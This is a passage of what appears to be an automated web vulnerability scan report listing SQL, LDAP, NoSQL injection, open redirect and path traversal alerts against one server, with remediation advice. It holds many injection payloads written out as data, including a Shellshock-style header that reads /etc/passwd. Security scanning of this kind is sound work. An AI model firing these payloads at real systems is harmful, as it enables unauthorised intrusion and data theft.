Do not trust client side input, even if there is client side validation in place.
In general, type check all data on the server side.
If the application uses JDBC, use PreparedStatement or CallableStatement, with parameters passed by '?'
If the application uses ASP, use ADO Command Objects with strong type checking and parameterized queries.
If database Stored Procedures can be used, use them.
Do *not* concatenate strings into queries in the stored procedure, or use 'exec', 'exec immediate', or equivalent functionality!
Do not create dynamic SQL queries using simple string concatenation.
Escape all data received from the client.
Apply an 'allow list' of allowed characters, or a 'deny list' of disallowed characters in user input.
Apply the privilege of least privilege by using the least privileged database user possible.
In particular, avoid using the 'sa' or 'db-owner' database users. This does not eliminate SQL injection, but minimizes its impact.
Grant the minimum database access that is necessary for the application.
|
| Reference | https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html |
| Tags |
OWASP_2021_A03
OWASP_2017_A01 |
| CWE Id | 89 |
| WASC Id | 19 |
| Plugin Id | 90018 |
|
High |
External Redirect |
|---|---|
| Description |
URL redirectors represent common functionality employed by web sites to forward an incoming request to an alternate resource. This can be done for a variety of reasons and is often done to allow resources to be moved within the directory structure and to avoid breaking functionality for users that request the resource at its previous location. URL redirectors may also be used to implement load balancing, leveraging abbreviated URLs or recording outgoing links. It is this last implementation which is often used in phishing attacks as described in the example below. URL redirectors do not necessarily represent a direct security vulnerability but can be abused by attackers trying to social engineer victims into believing that they are navigating to a site other than the true destination.
|
| URL | http://142.202.242.172/xampp |
| Method | GET |
| Parameter | host |
| Attack | 7548671629728595560.owasp.org |
| Evidence | 7548671629728595560.owasp.org |
| Request Header - size: 254 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 248 bytes. | |
| Response Body - size: 370 bytes. | |
| Instances | 1 |
| Solution |
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Use an allow list of approved URLs or domains to be used for redirection.
Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving your site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems when generating the disclaimer page.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "/login.asp" and ID 2 could map to "https://www.example.com/". Features such as the ESAPI AccessReferenceMap provide this capability.
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
|
| Reference |
https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html
https://cwe.mitre.org/data/definitions/601.html |
| Tags |
OWASP_2021_A03
WSTG-v42-CLNT-04 OWASP_2017_A01 |
| CWE Id | 601 |
| WASC Id | 38 |
| Plugin Id | 20019 |
|
High |
LDAP Injection |
|---|---|
| Description |
LDAP Injection may be possible. It may be possible for an attacker to bypass authentication controls, and to view and modify arbitrary data in the LDAP directory.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | password |
| Attack | Equivalent LDAP expression: [\' UNION SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),\'a\') -- -)(objectClass=*]. Random parameter: [p1znp6wofqs4vmgkdzob037dwmdnpaovyv3zcpy7o9xf829jwq90wooa3789bdsugi4tptljm7y2pfxq34kv4exmqusopkl92uwo6]. |
| Evidence | |
| Request Header - size: 1,061 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 252 bytes. | |
| Response Body - size: 0 bytes. | |
| Instances | 1 |
| Solution |
Validate and/or escape all user input before using it to create an LDAP query. In particular, the following characters (or combinations) should be deny listed:
&
|
!
<
>
=
~=
>=
<=
*
(
)
,
+
-
"
'
;
\
/
NUL character
|
| Reference |
http://www.testingsecurity.com/how-to-test/injection-vulnerabilities/LDAP-Injection
https://owasp.org/www-community/attacks/LDAP_Injection |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-06 OWASP_2017_A01 |
| CWE Id | 90 |
| WASC Id | 29 |
| Plugin Id | 40015 |
|
High |
NoSQL Injection - MongoDB |
|---|---|
| Description |
MongoDB query injection may be possible.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | |
| Evidence | |
| Request Header - size: 221 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | Content-Type |
| Attack | |
| Evidence | |
| Request Header - size: 1,061 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 252 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172//dashboard.php?id=54 |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 791 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 205 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php/327qi |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 211 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php/327qi/Capture.PNG |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 409 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php/327qi/Sound%20Effects |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 227 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//login.php/327qi/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 423 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 185 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172//tasks_page.php |
| Method | GET |
| Parameter | TQUIA729JAULAMJS |
| Attack | TQUIA729JAULAMJS[$ne] |
| Evidence | |
| Request Header - size: 443 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 240 bytes. | |
| Response Body - size: 301 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | POST |
| Parameter | Content-Type |
| Attack | Content-Type[$ne] |
| Evidence | |
| Request Header - size: 1,028 bytes. | |
| Request Body - size: 208 bytes. | |
| Response Header - size: 255 bytes. | |
| Response Body - size: 3,435 bytes. | |
| Instances | 10 |
| Solution |
Do not trust client side input and escape all data on the server side.
Avoid to use the query input directly into the where and group clauses and upgrade all drivers at the latest available version.
|
| Reference |
https://arxiv.org/pdf/1506.04082.pdf
https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-05 OWASP_2017_A01 |
| CWE Id | 943 |
| WASC Id | 19 |
| Plugin Id | 40033 |
|
High |
Path Traversal |
|---|---|
| Description |
The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.
Most web sites restrict user access to a specific portion of the file-system, typically called the "web document root" or "CGI root" directory. These directories contain the files intended for user access and the executable necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, Path Traversal attacks will utilize the ability of special-characters sequences.
The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource location requested in the URL. Although most popular web servers will prevent this technique from escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode-encoding ("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\") on Windows-based servers, URL encoded characters "%2e%2e%2f"), and double URL encoding ("..%255c") of the backslash character.
Even if the web server properly restricts Path Traversal attempts in the URL path, a web application itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is substituted with the file name of one of the web application's dynamic scripts. Consequently, the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot (".") to reveal the listing of the current working directory, or "%00" NULL characters in order to bypass rudimentary file extension checks.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW |
| Method | GET |
| Parameter | host |
| Attack | /login.php |
| Evidence | |
| Request Header - size: 744 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 325 bytes. | |
| Instances | 1 |
| Solution |
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
For filenames, use stringent allow lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses, and exclude directory separators such as "/". Use an allow list of allowable file extensions.
Warning: if you attempt to cleanse your data, then do so that the end result is not in the form that can be dangerous. A sanitizing mechanism can remove characters such as '.' and ';' which may be required for some exploits. An attacker can try to fool the sanitizing mechanism into "cleaning" data into a dangerous form. Suppose the attacker injects a '.' inside a filename (e.g. "sensi.tiveFile") and the sanitizing mechanism removes the character resulting in the valid filename, "sensitiveFile". If the input data are now assumed to be safe, then the file may be compromised.
Inputs should be decoded and canonicalized to the application's current internal representation before being validated. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allow list schemes by introducing dangerous inputs after they have been checked.
Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links.
Run your code using the lowest privileges that are required to accomplish the necessary tasks. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
|
| Reference |
https://owasp.org/www-community/attacks/Path_Traversal
https://cwe.mitre.org/data/definitions/22.html |
| Tags |
OWASP_2021_A01
WSTG-v42-ATHZ-01 OWASP_2017_A05 |
| CWE Id | 22 |
| WASC Id | 33 |
| Plugin Id | 6 |
|
High |
SQL Injection |
|---|---|
| Description |
SQL injection may be possible.
|
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 714 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | Sec-Fetch-Site |
| Attack | same-origin% |
| Evidence | |
| Request Header - size: 699 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54 |
| Method | GET |
| Parameter | User-Agent |
| Attack | () {:;}; /bin/cat /etc/passwd%' -- |
| Evidence | |
| Request Header - size: 698 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54%22+AND+%221%22%3D%221 |
| Method | GET |
| Parameter | id |
| Attack | 54" OR "1"="1 |
| Evidence | |
| Request Header - size: 720 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"" AND "1"="1 |
| Evidence | |
| Request Header - size: 819 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua-mobile |
| Attack | ?0' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 823 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | Sec-Fetch-Dest |
| Attack | document OR 1=1 -- |
| Evidence | |
| Request Header - size: 818 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54 |
| Method | GET |
| Parameter | Sec-Fetch-Mode |
| Attack | navigate AND 1=1 |
| Evidence | |
| Request Header - size: 815 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=56-2 |
| Method | GET |
| Parameter | id |
| Attack | 56-2 |
| Evidence | |
| Request Header - size: 809 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows" OR 1=1 -- |
| Evidence | |
| Request Header - size: 646 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1%20AND%201=1 |
| Method | GET |
| Parameter | 327qi OR 1=1 |
| Attack | 327qi OR 1=1 OR 1=1 |
| Evidence | |
| Request Header - size: 250 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%20OR%201=1/Sound%20Effects |
| Method | GET |
| Parameter | 327qi |
| Attack | 327qi OR 1=1 |
| Evidence | |
| Request Header - size: 254 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | 327qi |
| Attack | 327qi%' -- |
| Evidence | |
| Request Header - size: 454 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi%25'%20%20--%20/Sound%20Effects/error.wav |
| Method | GET |
| Parameter | 327qi |
| Attack | 327qi%' -- |
| Evidence | |
| Request Header - size: 454 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects%20ASC%20%20--%20/error.wav |
| Method | GET |
| Parameter | Sound Effects |
| Attack | Sound Effects ASC -- |
| Evidence | |
| Request Header - size: 456 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects%25 |
| Method | GET |
| Parameter | Sound Effects |
| Attack | Sound Effects% |
| Evidence | |
| Request Header - size: 246 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav?query=query%22+OR+%221%22%3D%221%22+--+ |
| Method | GET |
| Parameter | query |
| Attack | query" OR "1"="1" -- |
| Evidence | |
| Request Header - size: 479 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 206 bytes. | |
| Response Body - size: 542 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects?query=query%25%27++--+ |
| Method | GET |
| Parameter | query |
| Attack | query%' -- |
| Evidence | |
| Request Header - size: 266 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 314 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV%25%27++--+&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV%' -- |
| Evidence | |
| Request Header - size: 781 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | Accept |
| Attack | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 737 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"% |
| Evidence | |
| Request Header - size: 722 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows"" OR "1"="1" -- |
| Evidence | |
| Request Header - size: 736 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | Sec-Fetch-Site |
| Attack | same-origin%" -- |
| Evidence | |
| Request Header - size: 727 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | Upgrade-Insecure-Requests |
| Attack | 1" OR "1"="1" -- |
| Evidence | |
| Request Header - size: 736 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54+AND+1%3D1+--+ |
| Method | GET |
| Parameter | id |
| Attack | 54 AND 1=1 -- |
| Evidence | |
| Request Header - size: 735 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | Accept-Language |
| Attack | en-US,en;q=0.9 OR 1=1 -- |
| Evidence | |
| Request Header - size: 781 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | Referer |
| Attack | https://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54' OR '1'='1 |
| Evidence | |
| Request Header - size: 782 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 370 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | sec-ch-ua-mobile |
| Attack | ?0%' -- |
| Evidence | |
| Request Header - size: 776 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows"%" -- |
| Evidence | |
| Request Header - size: 776 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54 |
| Method | GET |
| Parameter | User-Agent |
| Attack | () {:;}; /bin/cat /etc/passwd' AND '1'='1' -- |
| Evidence | |
| Request Header - size: 770 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54%25%27++--+ |
| Method | GET |
| Parameter | id |
| Attack | 54%' -- |
| Evidence | |
| Request Header - size: 781 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27+AND+1%3D1+--+&id=54 |
| Method | GET |
| Parameter | value |
| Attack | '1'=1' AND 1=1 -- |
| Evidence | |
| Request Header - size: 784 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27%25%27++--+&bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | command |
| Attack | '1'=1'%' -- |
| Evidence | |
| Request Header - size: 803 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV%22+AND+%221%22%3D%221%22+--+&id=54 |
| Method | GET |
| Parameter | bot |
| Attack | DESKTOP-95IQEEV" AND "1"="1" -- |
| Evidence | |
| Request Header - size: 821 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | sec-ch-ua-platform |
| Attack | "Windows"%' -- |
| Evidence | |
| Request Header - size: 798 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 261 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54 |
| Method | GET |
| Parameter | Upgrade-Insecure-Requests |
| Attack | 1' AND '1'='1 |
| Evidence | |
| Request Header - size: 804 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54%27+AND+%271%27%3D%271%27+--+ |
| Method | GET |
| Parameter | id |
| Attack | 54' OR '1'='1' -- |
| Evidence | |
| Request Header - size: 821 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 333 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Accept |
| Attack | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8%' -- |
| Evidence | |
| Request Header - size: 465 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Accept-Language |
| Attack | en-US,en;q=0.5' OR '1'='1' -- |
| Evidence | |
| Request Header - size: 475 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Sec-Fetch-Dest |
| Attack | document% |
| Evidence | |
| Request Header - size: 460 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Sec-Fetch-Mode |
| Attack | navigate' OR '1'='1' -- |
| Evidence | |
| Request Header - size: 475 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php |
| Method | GET |
| Parameter | Sec-Fetch-Site |
| Attack | none%" -- |
| Evidence | |
| Request Header - size: 465 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | Accept |
| Attack | text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' OR '1'='1 |
| Evidence | |
| Request Header - size: 715 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 260 bytes. | |
| Response Body - size: 560 bytes. | |
| URL | http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54 |
| Method | GET |
| Parameter | sec-ch-ua |
| Attack | "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"%" -- |
| Evidence | |
| Request Header - size: 710 bytes. | |
| Request Body - size: 0 bytes. | |
| Response Header - size: 369 bytes. | |
| Response Body - size: 0 bytes. | |
